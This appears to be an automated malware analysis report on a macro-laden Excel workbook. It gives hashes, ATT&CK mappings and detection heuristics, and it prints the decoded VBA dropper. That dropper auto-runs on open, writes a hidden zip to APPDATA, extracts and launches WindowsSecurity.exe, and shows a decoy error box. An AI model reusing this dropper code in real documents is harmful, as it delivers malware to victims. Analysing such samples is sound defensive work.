Malicious Office (OLE) / .XLSX — malware analysis report

Static analysis result for SHA-256 bd5cca30a4940bb5…

MALICIOUS

Office (OLE) / .XLSX

Size: 1.36 MB
Created: 2020-02-07 11:26:50
Authoring application: Microsoft Excel
First seen: 2022-08-05
MD5: 7db9a21aba18e410dec328b8a09ce407
SHA-1: 8790339cf9f4d3d132b777e1469fc8b3148f727c
SHA-256: bd5cca30a4940bb504385f6edc40fd6824c6aa996887094cbc977dbbc675c3ea
Risk Score: 176

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File
  • T1140 Deobfuscate or Obfuscate Malicious Code

The sample contains VBA macros that execute upon opening the workbook, as indicated by the Workbook_Open and OLE_VBA_WBOPEN heuristics. The script constructs a path to %APPDATA%\WindowsSecurity.zip, writes obfuscated byte data (read from a hidden UserForm text box and split on "-") to this file, and then uses Shell.Application to extract and execute a file named WindowsSecurity.exe from the zip archive. The executable is launched only after a fake "Microsoft Error" message box is shown to the user. This behavior strongly suggests downloader or dropper functionality.

Heuristics (6)

  • VBA macros detected [medium] OLE_VBA_MACROS (5 related findings)
    Document contains VBA macro code
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Matched line in script: Shell folder_name & file_name & ".e" & "xe", vbNormalNoFocus
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    Matched line in script: Set oApp = CreateObject("Shell.Application")
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro [low] OLE_VBA_WBOPEN
    Matched line in script: Sub Workbook_Open()
  • Environ() call (env variable access) [low] OLE_VBA_ENVIRON
    Matched line in script: folder_name = Environ$("APPDATA") & "\"

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2911 bytes
SHA-256: fd33eb39e6cdaba21e08b3cb7ad42f38c7e0fe913ced164adb5f34a8d1465bb7
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
 Sub Workbook_Open()

hola
End Sub

 Sub unzipper(zFname As Variant, eFname As Variant)
    Dim FSO As Object
    
    Dim oApp As Object
     
    Set oApp = CreateObject("Shell.Application")
    
    oApp.Namespace(eFname).CopyHere oApp.Namespace(zFname).items
    
   
End Sub


Sub hola()

Dim path_file As String

Dim file_name As String

Dim folder_name As Variant

Dim byt() As Byte

Dim ar1Gohra() As String


file_name = "WindowsSecurity"

folder_name = Environ$("APPDATA") & "\"

If Dir(folder_name, vbDirectory) = "" Then
MkDir (folder_name)
End If


path_file = folder_name & file_name

Dim linGohra As Double

linGohra = 0
Dim liar As Integer

liar = 0

Dim btsGohra7(361128) As Byte
ar1Gohra = Split(UserForm1.TextBox1.Text, "-")

For Each vl In ar1Gohra
btsGohra7(linGohra) = CByte(vl)
linGohra = linGohra + 1
Next


Open path_file & ".zip" For Binary Access Write As #3
Put #3, , btsGohra7
Close #3




If Dir(folder_name & file_name & ".e" & "xe") = "" Then
unzipper folder_name & file_name & ".zip", folder_name
End If

 Dim a As String
a = MsgBox("Microsoft Office Excel: This Version isn't Compatible with This file.", vbCritical, "Microsoft Error")


Shell folder_name & file_name & ".e" & "xe", vbNormalNoFocus


End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{1431F97C-471B-4F10-9B03-8ECA78809132}{33DA1254-85A2-467D-A205-17541BE63550}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub TextBox1_Change()

End Sub
Filename: ole10native_00.bin
Kind: ole-package
Source: OLE Ole10Native stream: MBD010F1B0C/Ole10Native
Size: 71968 bytes
SHA-256: 361f1ff9aa84c59fa8f8a14f734d7b2bc602ae6f126bd5284d0672dda7be072a